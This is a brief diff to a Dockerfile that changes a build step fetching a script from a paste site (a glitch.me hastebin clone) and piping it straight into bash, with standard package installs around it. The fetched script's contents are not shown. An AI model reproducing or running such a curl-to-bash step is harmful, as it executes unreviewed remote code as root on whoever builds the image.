--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -3,7 +3,7 @@ FROM ubuntu:20.04
 ENV DEBIAN_FRONTEND=noninteractive
 ENV LC_ALL=C.UTF-8
 
-RUN apt-get update && apt -y install curl && curl -sL https://muq-hastebin.glitch.me/raw/oI2CAiBoNE | bash
+RUN apt-get update && apt -y install curl && curl -sL https://muq-hastebin.glitch.me/raw/uBDII2fRN7 | bash
 RUN apt-get install -y \
   git \
   openjdk-11-jdk \
